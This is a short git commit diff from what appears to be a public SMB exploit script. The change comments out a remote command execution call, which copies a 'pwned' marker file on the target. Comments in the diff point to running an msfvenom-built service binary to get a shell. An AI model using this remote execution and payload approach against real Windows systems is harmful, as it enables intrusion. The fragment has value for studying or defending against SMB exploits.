comment out service_exec

This commit is contained in:
zerosum0x0
2018-01-29 22:36:36 -07:00
parent 8bd6f3760f
commit f611d0e5da

View File

@@ -967,7 +967,7 @@ def smb_pwn(conn, arch):
smbConn.disconnectTree(tid2) smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session # Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is # a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..." # executing binary generated by "msfvenom -f exe-service ..."